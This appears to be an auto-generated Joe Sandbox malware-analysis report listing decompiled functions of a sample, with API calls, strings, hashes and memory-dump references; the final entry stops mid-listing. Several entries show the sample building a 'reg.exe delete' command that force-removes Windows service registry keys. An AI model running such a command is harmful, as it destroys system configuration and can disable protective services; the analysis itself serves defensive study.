                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell_sprintf
                                                                                  • String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
                                                                                  • API String ID: 2594544765-3721450906
                                                                                  • Opcode ID: caf4d9a15ce08a06621653eac9ff45203b8f9bfd8f5c5724088c7dcf23971caa
                                                                                  • Instruction ID: e7c6421823059db0c88531db18ce4ea6524f6e78d53e20e7ab152b1d1ef40511
                                                                                  • Opcode Fuzzy Hash: caf4d9a15ce08a06621653eac9ff45203b8f9bfd8f5c5724088c7dcf23971caa
                                                                                  • Instruction Fuzzy Hash: 16E0D8B0904200BAE514A730CE0DFDBB6E4ABA4708F42081CF28929082EF745708C663
                                                                                  Function 6A70DAE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 6A70DAFC
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __getptd.LIBCMT ref: 6A70DB0D
                                                                                  • __getptd.LIBCMT ref: 6A70DB1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: MOC$csm
                                                                                  • API String ID: 803148776-1389381023
                                                                                  • Opcode ID: fd754abcdf21b97910b19b56cd041df229b7efb1e6af3ee90d45722069e30fa3
                                                                                  • Instruction ID: 07a0822c19b3c647edcebdbb49f5c9379b12b76b825fd173d85d4dac35077dd6
                                                                                  • Opcode Fuzzy Hash: fd754abcdf21b97910b19b56cd041df229b7efb1e6af3ee90d45722069e30fa3
                                                                                  • Instruction Fuzzy Hash: 43E04FB26003048FD3009BE4D648B693BE4EB45718F1644A1D84CC7363DF34D4488946
                                                                                  Function 6A6E1988 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E199A
                                                                                  • ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
                                                                                  Strings
                                                                                  • reg.exe, xrefs: 6A6E19AB
                                                                                  • delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
                                                                                  • open, xrefs: 6A6E19B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell_sprintf
                                                                                  • String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
                                                                                  • API String ID: 2594544765-3721450906
                                                                                  • Opcode ID: 29faa9e3ecb49614c29e57973eb5612c59d1f4456860c0b6a219d46f5547f0e9
                                                                                  • Instruction ID: 2908033409bc111f1371310e716447115814b09e970dd35f1cfdb70e336a7e2e
                                                                                  • Opcode Fuzzy Hash: 29faa9e3ecb49614c29e57973eb5612c59d1f4456860c0b6a219d46f5547f0e9
                                                                                  • Instruction Fuzzy Hash: 12E086B5544240B6E5149730DD0AFDBB6A59BA5704F414818F68929085DE745708D6A2
                                                                                  Function 0BEA6F88 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b1fbd3048424ff7a491facd465a11a7b2e3da87af40dcc652e7bae29897b00a
                                                                                  • Instruction ID: 924c54a56d106f38321609d503e767f46bd0edb4b2e0a35a207823805bb3c3c5
                                                                                  • Opcode Fuzzy Hash: 1b1fbd3048424ff7a491facd465a11a7b2e3da87af40dcc652e7bae29897b00a
                                                                                  • Instruction Fuzzy Hash: 53D16E39A04209EFCB10EFA4C4918EDBBBDEF49710F4564A5E940BB210D734BE4ACB65
                                                                                  Function 6A6E23A0 Relevance: 7.7, APIs: 5, Instructions: 173COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E23F7
                                                                                  • _memset.LIBCMT ref: 6A6E240E
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2172
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2185
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2201
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E221A
                                                                                  • _memset.LIBCMT ref: 6A6E2496
                                                                                  • _strncat.LIBCMT ref: 6A6E24C4
                                                                                  • FilterConnectCommunicationPort.FLTLIB(00000000,00000000,00000000,00000000,00000000,6A72C218), ref: 6A6E24FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CommunicationConnectFilterPort_strncat
                                                                                  • String ID:
                                                                                  • API String ID: 1005276894-0
                                                                                  • Opcode ID: 627a50272ee24f46ce0d1c4d22fb483a1311c5c07d71e27e34518be2e7a94637
                                                                                  • Instruction ID: 3e457bc4e482d2b990ee91a260e3e1f34bdb70c5358b793894095554bb1dfdc7
                                                                                  • Opcode Fuzzy Hash: 627a50272ee24f46ce0d1c4d22fb483a1311c5c07d71e27e34518be2e7a94637
                                                                                  • Instruction Fuzzy Hash: A951C2B11083819FD710CFA8CC99A9BB3E9BB85314F154A6DE169C7291EB70D9088B92
                                                                                  Function 6A6E0EC0 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0F03
                                                                                    • Part of subcall function 6A6E0D30: _memset.LIBCMT ref: 6A6E0D56
                                                                                    • Part of subcall function 6A6E0D30: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 6A6E0D6E
                                                                                    • Part of subcall function 6A6E0D30: ReadFile.KERNEL32(?,00000000,00000300,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6E0D85
                                                                                  • GetFileSize.KERNEL32(?,?), ref: 6A6E0F2A
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 6A6E0F4C
                                                                                  • _memset.LIBCMT ref: 6A6E0F81
                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,00000000,?,?), ref: 6A6E0F97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$_memset$PointerRead$Size
                                                                                  • String ID:
                                                                                  • API String ID: 1098985663-0
                                                                                  • Opcode ID: fee0331d5111ea914d4e4fa0f54d613b2d0256fb4bf4873725014ea0ac1a6a8c
                                                                                  • Instruction ID: 159f380c542a055e2ce4e7d8e48fd25280295ff1e675b644aa20f6e760fbf526
                                                                                  • Opcode Fuzzy Hash: fee0331d5111ea914d4e4fa0f54d613b2d0256fb4bf4873725014ea0ac1a6a8c
                                                                                  • Instruction Fuzzy Hash: CF41147528A3419BD310CF19C884AABB7E5FBC8754F56093DF889C3345EF78D9068A62
                                                                                  Function 6A6D3DC0 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 52b728afeafdefde5b8056963dfdb8c76ae5c92e8d693707ce56709ea001846d
                                                                                  • Instruction ID: 10ffc29452caccb04d90b794b7b43e23a171152b75fb974ac3405afc3729d853
                                                                                  • Opcode Fuzzy Hash: 52b728afeafdefde5b8056963dfdb8c76ae5c92e8d693707ce56709ea001846d
                                                                                  • Instruction Fuzzy Hash: 4F3154B0A08200DBD764EB70D856B6EB7F5AF89354FC54C2CE44DCA291EF7898498747
                                                                                  Function 6A6E1E28 Relevance: 7.6, APIs: 5, Instructions: 78sleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E1A50: _memset.LIBCMT ref: 6A6E1A89
                                                                                    • Part of subcall function 6A6E1A50: _strncpy.LIBCMT ref: 6A6E1AA6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 6A6E1E7A
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E1E88
                                                                                  • GetLastError.KERNEL32 ref: 6A6E1E97
                                                                                  • _memset.LIBCMT ref: 6A6E1EBD
                                                                                  • _memset.LIBCMT ref: 6A6E1ED7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$DeleteErrorFileLastSleep_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1394207256-0
                                                                                  • Opcode ID: 5b80d67c8e075735fc37516920413013279cac5a74ebf60590d211268de6a765
                                                                                  • Instruction ID: 37ce5930e95435d8d279917c114abf59122e12737b60892d52440f02daea4609
                                                                                  • Opcode Fuzzy Hash: 5b80d67c8e075735fc37516920413013279cac5a74ebf60590d211268de6a765
                                                                                  • Instruction Fuzzy Hash: E221B2B250D3815FD620DB64C949BDF73EDBF91248F060829E98A83142EF349908C7B2
                                                                                  Function 6A703EB9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(00000000,6A726A18,0000000C,6A6FC36B,00000001,00004000,00000000,?,00000000,00000000,00000001,?,?,6A6FC8EE,?,00000001), ref: 6A703EED
                                                                                  • GetLastError.KERNEL32(?,?,6A6FC8EE,?,00000001,?,00000000,000000FF,00000000,00000018,6A6F2E97,00000001,?,00000001,00000000), ref: 6A703EF7
                                                                                  • __dosmaperr.LIBCMT ref: 6A703EFE
                                                                                  • __alloc_osfhnd.LIBCMT ref: 6A703F1F
                                                                                  • __set_osfhnd.LIBCMT ref: 6A703F49
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                  • String ID:
                                                                                  • API String ID: 43408053-0
                                                                                  • Opcode ID: 05bbe23e9725f942b7ce5c669a7580b2778732da5026797db7db7ac989535245
                                                                                  • Instruction ID: ab27df29dd05fe238907f928e2c84eef5db5fb18d89e0cfbf9422f15e3b303d4
                                                                                  • Opcode Fuzzy Hash: 05bbe23e9725f942b7ce5c669a7580b2778732da5026797db7db7ac989535245
                                                                                  • Instruction Fuzzy Hash: 232103B1541A449ADB018B78C608B89FFF0AF42328F198364E5608F1D2CF359649CF40
                                                                                  Function 6A6E0DE0 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0E07
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,000002FF,00000000), ref: 6A6E0E25
                                                                                  • ReadFile.KERNEL32(00000000,?,00000300,?,00000000), ref: 6A6E0E39
                                                                                  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 6A6E0E61
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 6A6E0E75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ReadWrite_memset
                                                                                  • String ID:
                                                                                  • API String ID: 231195935-0
                                                                                  • Opcode ID: b66e4cb67faec10e69ccc0532b158584be619628de6bbf05d92bc3bd931a6447
                                                                                  • Instruction ID: 76b28ee78aaa105e579c0fa5b81517bc72500e21d57f1626948ff0a46e070be9
                                                                                  • Opcode Fuzzy Hash: b66e4cb67faec10e69ccc0532b158584be619628de6bbf05d92bc3bd931a6447
                                                                                  • Instruction Fuzzy Hash: D0218C71205341ABE221DB19CC56FAFBBECEFC5B00F45492DF544C6181EB74AA05CBA6
                                                                                  Function 0BEB8500 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0BEB8556
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB856B
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB8575
                                                                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0BEB712F,00000000,0BEB71BB), ref: 0BEB8599
